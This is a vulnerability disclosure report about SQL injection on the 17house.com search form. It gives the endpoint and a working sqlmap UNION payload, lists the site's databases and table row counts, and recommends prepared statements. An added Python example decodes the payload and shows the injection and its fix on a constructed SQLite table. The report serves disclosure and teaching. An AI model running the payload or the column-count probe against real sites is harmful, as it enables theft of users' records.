
Vulnerability summary

Defect ID: wooyun-2015-0126490

Title: SQL injection on the 一起装修网 (17house.com) main site leaks tens of millions of records, including millions of user records

Vendor: 北京神州一起网络科技有限公司

Author: 路人甲

Submitted: 2015-07-18 09:01

Fix time: 2015-09-01 09:02

Published: 2015-09-01 09:02

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-18: Vendor being contacted and awaiting acknowledgement; details withheld from the public
2015-09-01: Vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

SQL injection on the 一起装修网 (17house.com) main site leaks tens of millions of records, including millions of user records.

Details:

Injection point: http://www.17house.com/xiaoguotu/gallery/seosearchurl (POST)
POST body as reported (the parameter name before the first "=" is missing on the page and is left as-is):
=%E6%90%9C %E7%B4%A2&searchword=%E8%AF%B7%E8%BE%93%E5%85%A5%E4%BF%A1%E6%81%AF
Decoded, searchword carries the form's placeholder text 请输入信息 ("please enter information"); searchword is the injectable parameter.

Proof (sqlmap output):

web application technology: PHP 5.3.3
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: searchword
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: =%E6%90%9C %E7%B4%A2&searchword=%E8%AF%B7%E8%BE%93%E5%85%A5%E4%BF%A1%E6%81%AF' UNION ALL SELECT CONCAT(0x7173786d71,0x54695741534d52524f6f,0x717a717371),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5
available databases [7]:
[*] acl
[*] bbs17up
[*] information_schema
[*] test
[*] topic
[*] ultrax
[*] wiki
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5.0
Database: ultrax
+--------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------+---------+
| sop_data_owner_statistics | 30077886 |
| pre_common_block_pic | 25090740 |
| cdb_visit_log | 10719559 |
| sop_data_keywords | 8023935 |
| pre_common_member_grouppm | 3018771 |
| sop_data_visit_log_zhuangxiu | 2925794 |
| sop_data_keywords_copy | 2737572 |
| sop_data_owner_log | 2722381 |
| house_smswilsend | 2321030 |
| sop_data_owner_maintenance | 2136465 |
| sop_data_error | 1213651 |
| pre_forum_post | 1173329 |
| web_tag_item | 1051338 |
| sop_data_groupon_owner | 1048650 |
| sop_data_persistence | 914206 |
| sop_data_owner_community | 751127 |
| pre_forum_statlog | 749995 |
| pre_ucenter_members | 643445 |
| pre_ucenter_memberfields | 642678 |
| sop_data_community_source | 608767 |
| sop_data_owner | 600198 |
| pre_security_evilpost | 594754 |
| pre_common_member | 584554 |
| pre_ucenter_feeds | 565288 |
| web_gallery_images | 563818 |
| sop_data_order | 499958 |
| web_gallery_images_copy | 457643 |
| sop_data_owner_copy1 | 394273 |
| pre_common_member_field_forum | 354730 |
| pre_common_member_field_home | 354676 |
| pre_common_member_status | 354673 |
| pre_common_member_count | 354672 |
| pre_common_member_profile | 351570 |
| sop_data_sms_pool | 337755 |
| sop_data_owner_copy | 331969 |
| pre_common_member_copy | 321207 |
| sop_data_groupon_demand_describe | 291077 |
| sop_data_login_log | 282058 |
| web_gallery_pic_seo | 273788 |
| sop_data_groupon_category_demand | 254576 |
| pre_forum_attachment | 225743 |
| sop_data_temp_tuiguang_bak | 217795 |
| sop_data_business_visit | 216169 |
| sop_data_attachments | 206941 |
| sop_data_temp_tuiguang | 201329 |
| sop_data_strange_phone_action_record | 173521 |
| web_uploads | 155186 |
| pre_forum_threadmod | 145343 |
| sop_data_groupon_demand | 145048 |
| sop_data_attachments_copy | 137752 |
| pre_forum_thread | 134684 |
| sop_data_owner_invite_status | 131494 |
| cdb_statistics | 126247 |
| sop_data_order_copy | 123133 |
| sop_data_sem_keywords | 119061 |
| pre_forum_typeoptionvar | 118672 |
| pre_home_notification | 118526 |
| cdb_grouporder | 112513 |
| cdb_orders | 110918 |
| web_news_footer_recommend | 109872 |
| pre_forum_threadlog | 109356 |
| sop_data_yuyue_visit | 108586 |
| pre_common_credit_rule_log | 107501 |
| pre_common_member_log | 104548 |
| sop_data_customer_assess | 103012 |
| pre_common_tagitem | 102374 |
| sop_data_order_status_log | 99871 |
| house_emailsend | 97450 |
| cdb_service_log | 95386 |
| cdb_owner | 90314 |
| pre_forum_order | 89221 |
| sop_data_community_audit | 82427 |
| sop_data_order_refund | 78882 |
| web_news | 74793 |
| pre_common_onlinetime | 72141 |
| sop_data_order_refund_operation_record | 64883 |
| sop_data_article_keywords | 63266 |
| web_news_tag | 58575 |
| sop_data_owner_voucher_new | 57106 |
| sop_data_yuyue | 56206 |
| cdb_typeoptionvars | 52401 |
| sop_data_sms_groupon | 52378 |
| web_feed | 49530 |
| web_gallery_click | 48175 |
| sop_data_order_refundreason | 46763 |
| sop_data_customer_message | 46492 |
| cdb_orderdetail | 45657 |
| pre_common_district | 45051 |
| sop_data_product_content | 43313 |
| sop_data_strange_phone | 40926 |
| pre_ucenter_authcode | 39149 |
| pre_common_word | 38721 |
| sop_data_product_module | 37319 |
| web_seo | 37159 |
| house_smswilsendback | 36300 |
| ticketpiao_log | 36075 |
| sop_data_groupon_business | 32897 |
| pre_forum_modwork | 32491 |
| supe_creditlog | 32010 |
| pre_common_member_action_log | 31248 |
| sop_data_groupon_module_product | 29556 |
| pre_ucenter_pm_members | 27171 |
| pre_forum_threadimage | 25946 |
| sop_data_blacklist | 25858 |
| sop_data_audit_log | 24319 |
| sop_data_business_history | 24185 |
| sop_syslog | 23816 |
| web_news_copy1 | 23727 |
| pre_plugin_lj_post | 22882 |
| pre_forum_attachment_6 | 22631 |
| pre_forum_attachment_2 | 22452 |
| pre_ucenter_pm_indexes | 22283 |
| pre_forum_attachment_0 | 22102 |
| pre_forum_attachment_4 | 22052 |
| pre_forum_attachment_9 | 21898 |
| cdb_sms_log | 21745 |
| pre_forum_attachment_7 | 21565 |
| pre_forum_attachment_5 | 21253 |
| pre_forum_attachment_1 | 21021 |
| sop_data_owner_notcall_maintenance | 20856 |
| sop_data_business_deposit_log | 20824 |
| pre_forum_attachment_8 | 20805 |
| pre_forum_attachment_3 | 20693 |
| supe_photoitems | 20617 |
| sop_data_price_groupon_good | 20077 |
| sop_data_sensitive | 20000 |
| sop_data_order_section | 19769 |
| cdb_login_log | 19365 |
| pre_common_tag | 18228 |
| sop_data_bargainproduct | 18090 |
| web_business_shop_picture | 18035 |
| sop_data_bargain | 17945 |
| sop_data_community | 17874 |
| pre_common_visit | 17561 |
| sop_data_sms_copy | 17515 |
| sop_data_sms_copy2 | 17496 |
| sop_data_yuyue_sendorder | 17464 |
| sop_data_business_message | 17426 |
| sop_data_groupon_discount_info | 16916 |
| web_image_tag | 16215 |
| sop_data_audit_log_history | 15133 |
| pre_mobile_wsq_threadlist | 14487 |
| sop_data_price_ingroupon | 14411 |
| web_comment_score | 14148 |
| web_gallery_relations | 14075 |
| pre_ucenter_pm_lists | 14061 |
| sop_data_owner_voucher | 13790 |
| sop_data_complain_log | 13373 |
| web_business_shop_score | 13370 |
| sop_data_groupon_good | 13046 |
| web_designer_cate_relation | 12982 |
| sop_data_gallery | 12906 |
| sop_data_gallery_copy | 11997 |
| sop_data_strange_phone_sms_pool | 11912 |
| sop_data_business_voucher_new | 11431 |
| pre_common_member_crime | 11206 |
| web_gallery_collect | 11144 |
| pre_portal_article_content | 9991 |
| sop_data_order_bank | 9937 |
| pre_portal_article_count | 9847 |
| pre_portal_article_title | 9839 |
| pre_forum_threaddisablepos | 9455 |
| pre_forum_attachment_unused | 9017 |
| pre_portal_article_content_copy | 8740 |
| pre_portal_article_title_copy1 | 8740 |

Fix:

Validate and filter the searchword parameter, and stop building the query by string concatenation: use prepared statements with bound parameters (PDO or mysqli in PHP) so that user input can never change the structure of the SQL statement.
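The following is an added example, not code from the report or from 17house.com. It does two things the report leaves implicit: it decodes the hex markers in the sqlmap UNION payload shown in the proof section (sqlmap wraps a random token between a prefix and a suffix so it can find its own output anywhere in the HTML response), and it reproduces the bug class and the fix against a constructed 12-column SQLite table, including the NULL-padding probe sqlmap used to arrive at "12 columns". The table name, schema, rows and the SQLite transcription of the MySQL payload (CONCAT(hex,...) written as 'a'||'b'||'c', the trailing MySQL "#" comment written as "-- ") are all assumptions made for the demonstration.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# The POST body exactly as the report shows it (the blank parameter name before
# the first "=" is how the page shows it and is not reconstructed here).
REPORTED_BODY = (
    "=%E6%90%9C %E7%B4%A2&searchword=%E8%AF%B7%E8%BE%93%E5%85%A5%E4%BF%A1%E6%81%AF"
    "' UNION ALL SELECT CONCAT(0x7173786d71,0x54695741534d52524f6f,0x717a717371),"
    "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#"
)


def injected_searchword(body: str) -> str:
    """Pull the searchword parameter out of a URL-encoded POST body."""
    return parse_qs(body, keep_blank_values=True)["searchword"][0]


def decode_sqlmap_markers(payload: str) -> str:
    """Turn CONCAT(0x..,0x..,0x..) into the text sqlmap looks for in the response:
    a prefix, a random token and a suffix, hex-encoded so no quotes are needed."""
    hexes = re.findall(r"0x([0-9a-fA-F]+)", payload)
    return "".join(bytes.fromhex(h).decode("ascii") for h in hexes)


# Constructed 12-column stand-in for the gallery table (assumed schema, not the
# real site's); 12 matches the column count sqlmap reported.
COLUMNS = ["title"] + [f"c{i}" for i in range(2, 13)]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gallery (" + ", ".join(c + " TEXT" for c in COLUMNS) + ")")
    placeholders = "(?" + ",?" * (len(COLUMNS) - 1) + ")"
    conn.execute("INSERT INTO gallery VALUES " + placeholders, ["kitchen"] + ["x"] * 11)
    conn.execute("INSERT INTO gallery VALUES " + placeholders, ["bedroom"] + ["y"] * 11)
    conn.commit()
    return conn


def search_vulnerable(conn: sqlite3.Connection, searchword: str) -> list:
    """String concatenation: the pattern the report's finding implies."""
    sql = "SELECT * FROM gallery WHERE title = '" + searchword + "'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, searchword: str) -> list:
    """Bound parameter: the input is data and can never alter the statement."""
    return conn.execute("SELECT * FROM gallery WHERE title = ?", (searchword,)).fetchall()


def find_union_column_count(conn: sqlite3.Connection, max_cols: int = 20):
    """Mimic sqlmap's UNION column-count probe: grow the NULL list until the
    database stops complaining about mismatched column counts."""
    for n in range(1, max_cols + 1):
        probe = "' UNION ALL SELECT " + ",".join(["NULL"] * n) + " -- "
        try:
            search_vulnerable(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


# SQLite transcription of the report's MySQL payload (assumption: CONCAT of hex
# literals becomes ||-joined strings, the trailing "#" comment becomes "-- ").
SQLITE_PAYLOAD = (
    "请输入信息' UNION ALL SELECT 'qsxmq'||'TiWASMRROo'||'qzqsq',"
    + ",".join(["NULL"] * 11) + " -- "
)


def marker_in_rows(rows: list, prefix: str = "qsxmq", suffix: str = "qzqsq") -> bool:
    """What sqlmap does with the HTTP response: look for prefix+token+suffix."""
    return any(isinstance(v, str) and v.startswith(prefix) and v.endswith(suffix)
               for row in rows for v in row)


if __name__ == "__main__":
    conn = make_db()
    print(decode_sqlmap_markers(injected_searchword(REPORTED_BODY)))
    print(find_union_column_count(conn))
    print(marker_in_rows(search_vulnerable(conn, SQLITE_PAYLOAD)))  # injection lands
    print(marker_in_rows(search_safe(conn, SQLITE_PAYLOAD)))        # payload is a literal
```

With the concatenated query the payload returns a synthetic row whose first column is the marker, which is exactly the signal sqlmap keyed on; with the bound parameter the same payload is just a title nobody has, and the query returns nothing. The column-count probe stops at 12 because a UNION with any other number of NULLs is rejected by the parser before it runs.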

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Vendor could not be contacted, or the vendor actively declined the report.